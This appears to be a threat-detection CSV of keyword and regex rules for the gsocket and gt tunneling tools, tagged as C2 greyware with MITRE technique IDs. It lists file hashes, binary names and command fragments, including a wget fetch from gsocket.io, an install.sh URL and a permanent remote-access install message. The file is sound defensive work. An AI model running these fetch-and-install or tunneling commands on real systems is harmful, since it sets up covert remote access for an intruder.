"*f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9*",".{0,1000}f32a57e81fc9d08ca1412e932e8701a45ed35b0213c0da78bee8e65a1c6942e9.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52*",".{0,1000}f94c9642833e1efd81b07dcb06bf653f61937ae8b7baf69b3731ac1132a66d52.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864*",".{0,1000}fc0e69e5c2f4ed4cfb830ebb66ba54a86ce95a114603a5fffa42cea8caf3e864.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c*",".{0,1000}fcea3e6443289fde4faa10d9d892ce4f0c23f90913dbfde6c9f60c825f92150c.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb*",".{0,1000}fd57273dcd84084b20ad214de3b38c4e5a3f506da7810574d4a68dcdd63176cb.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063*",".{0,1000}fecf1da09ddb7a5f5ab7cc20c6d542be33193cbc30e5c8c3dd877cee6a682063.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*GS_SO_TOR_DOMAIN*",".{0,1000}GS_SO_TOR_DOMAIN.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-full-pipe -s *",".{0,1000}gs\-full\-pipe\s\-s\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat -*",".{0,1000}gs\-netcat\s\-.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat *.tar.gz*",".{0,1000}gs\-netcat\s.{0,1000}\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_freebsd-x86_64*",".{0,1000}gs\-netcat_freebsd\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-aarch64*",".{0,1000}gs\-netcat_linux\-aarch64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-arm*",".{0,1000}gs\-netcat_linux\-arm.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-armhf*",".{0,1000}gs\-netcat_linux\-armhf.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-armv6*",".{0,1000}gs\-netcat_linux\-armv6.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-armv7l*",".{0,1000}gs\-netcat_linux\-armv7l.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-i686*",".{0,1000}gs\-netcat_linux\-i686.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-mips32*",".{0,1000}gs\-netcat_linux\-mips32.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-mips64*",".{0,1000}gs\-netcat_linux\-mips64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-mipsel*",".{0,1000}gs\-netcat_linux\-mipsel.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_linux-x86_64*",".{0,1000}gs\-netcat_linux\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_macOS*",".{0,1000}gs\-netcat_macOS.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-netcat_openbsd-x86_64*",".{0,1000}gs\-netcat_openbsd\-x86_64.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket /usr/sbin/sshd*",".{0,1000}gsocket\s\/usr\/sbin\/sshd.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket -k *",".{0,1000}gsocket\s\-k\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket openvpn --*",".{0,1000}gsocket\sopenvpn\s\-\-.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket ssh *",".{0,1000}gsocket\sssh\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket.io/deploy*",".{0,1000}gsocket\.io\/deploy.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket/gsocket.h*",".{0,1000}gsocket\/gsocket\.h.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket_macOS.tar.gz*",".{0,1000}gsocket_macOS\.tar\.gz.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*GSOCKET_SECRET*",".{0,1000}GSOCKET_SECRET.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*GSOCKET_SOCKS_IP*",".{0,1000}GSOCKET_SOCKS_IP.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*GSOCKET_SOCKS_PORT*",".{0,1000}GSOCKET_SOCKS_PORT.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gsocket-relay/monitor/*",".{0,1000}gsocket\-relay\/monitor\/.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-sftp -l*",".{0,1000}gs\-sftp\s\-l.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*gs-sftp -s thctestserver*",".{0,1000}gs\-sftp\s\-s\sthctestserver.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*hackerschoice/gsocket*",".{0,1000}hackerschoice\/gsocket.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*https://gsocket.io/install.sh*",".{0,1000}https\:\/\/gsocket\.io\/install\.sh.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*Installing systemwide remote access permanentally*",".{0,1000}Installing\ssystemwide\sremote\saccess\spermanentally.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*Join us on Telegram - https://t.me/thcorg*",".{0,1000}Join\sus\son\sTelegram\s\-\shttps\:\/\/t\.me\/thcorg.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*Running: netcat *",".{0,1000}Running\:\snetcat\s.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*socat - TCP_LISTEN:31337*",".{0,1000}socat\s\-\sTCP_LISTEN\:31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*TCP:gsocket:31337*",".{0,1000}TCP\:gsocket\:31337.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*Testing Global Socket Relay Network*",".{0,1000}Testing\sGlobal\sSocket\sRelay\sNetwork.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"*wget -qO- gsocket.io*",".{0,1000}wget\s\-qO\-\sgsocket\.io.{0,1000}","greyware_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1431","123","2024-08-20T19:40:01Z","2020-09-18T16:14:22Z"
"* gt-win-x86_64.exe*",".{0,1000}\sgt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/gt server -c ./config.yml*",".{0,1000}\/gt\sserver\s\-c\s\.\/config\.yml.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/gt-win-x86_64.exe*",".{0,1000}\/gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/opt/config/aonetwork-client.yml*",".{0,1000}\/opt\/config\/aonetwork\-client\.yml.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/opt/entrypoint.sh*",".{0,1000}\/opt\/entrypoint\.sh.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/release/gt-win-x86_64.exe*",".{0,1000}\/release\/gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/usr/bin/gt client-c *",".{0,1000}\/usr\/bin\/gt\sclient\-c\s.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/x86_64-pc-windows-msvc/release/gt.exe*",".{0,1000}\/x86_64\-pc\-windows\-msvc\/release\/gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*/x86_64-pc-windows-msvc/release/gt.exe*",".{0,1000}\/x86_64\-pc\-windows\-msvc\/release\/gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*\gt-win-x86_64.exe*",".{0,1000}\\gt\-win\-x86_64\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*\x86_64-pc-windows-msvc\release\gt.exe*",".{0,1000}\\x86_64\-pc\-windows\-msvc\\release\\gt\.exe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*037be40510a193376a127023deb2fe312d265b5ebc78422879e9126c5d02f2b4*",".{0,1000}037be40510a193376a127023deb2fe312d265b5ebc78422879e9126c5d02f2b4.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*1a535e15b11923cd368d6b39e1a308b67d7ed2be686d7968aa50e5c3630ea11a*",".{0,1000}1a535e15b11923cd368d6b39e1a308b67d7ed2be686d7968aa50e5c3630ea11a.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*1f51e236e7e1fbeb8cf38462e17da4d1921aeef093e2990538a4eb1d35554076*",".{0,1000}1f51e236e7e1fbeb8cf38462e17da4d1921aeef093e2990538a4eb1d35554076.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*2a17ed79b4a0cb9d1c6345ee3f0d1c6d349a660391345c17e78ceb57a26a32fe*",".{0,1000}2a17ed79b4a0cb9d1c6345ee3f0d1c6d349a660391345c17e78ceb57a26a32fe.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*300161cd89c6094776ad40c08308249c7323c9b19105e09f15ef209f4e1f7980*",".{0,1000}300161cd89c6094776ad40c08308249c7323c9b19105e09f15ef209f4e1f7980.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*56be52735563e73f0cdf9d4e8b52f86ccc5313495eec99c69c6f2bfeb0a08317*",".{0,1000}56be52735563e73f0cdf9d4e8b52f86ccc5313495eec99c69c6f2bfeb0a08317.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*71e29bff6cee7938472b8d16ea5696b4966cb587a266c43257770efffed93aae*",".{0,1000}71e29bff6cee7938472b8d16ea5696b4966cb587a266c43257770efffed93aae.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*ab894c2ffa7886fe889c4a35b15fc5d5558d11896550d563c299408e6d4da363*",".{0,1000}ab894c2ffa7886fe889c4a35b15fc5d5558d11896550d563c299408e6d4da363.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*c46ac57304fda332b5c3b027ae3fd0a54917e2b194f0d9f13e6cacfa1f61ff53*",".{0,1000}c46ac57304fda332b5c3b027ae3fd0a54917e2b194f0d9f13e6cacfa1f61ff53.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*ed1f4ff9004e7065939247b9df3e4d51e08a0c990931e438b733fb4e64b4adf2*",".{0,1000}ed1f4ff9004e7065939247b9df3e4d51e08a0c990931e438b733fb4e64b4adf2.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","0","#filehash","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*ghcr.io/ao-space/gt:client-dev*",".{0,1000}ghcr\.io\/ao\-space\/gt\:client\-dev.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
"*ghcr.io/ao-space/gt:server-dev*",".{0,1000}ghcr\.io\/ao\-space\/gt\:server\-dev.{0,1000}","greyware_tool_keyword","gt","Fast WebSocket(s)/HTTP(s)/TCP relay proxy for making tunnels to localhost.","T1572 - T1048","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/ao-space/gt","1","1","N/A","N/A","10","10","111","32","2024-05-26T09:48:05Z","2021-11-29T03:09:56Z"
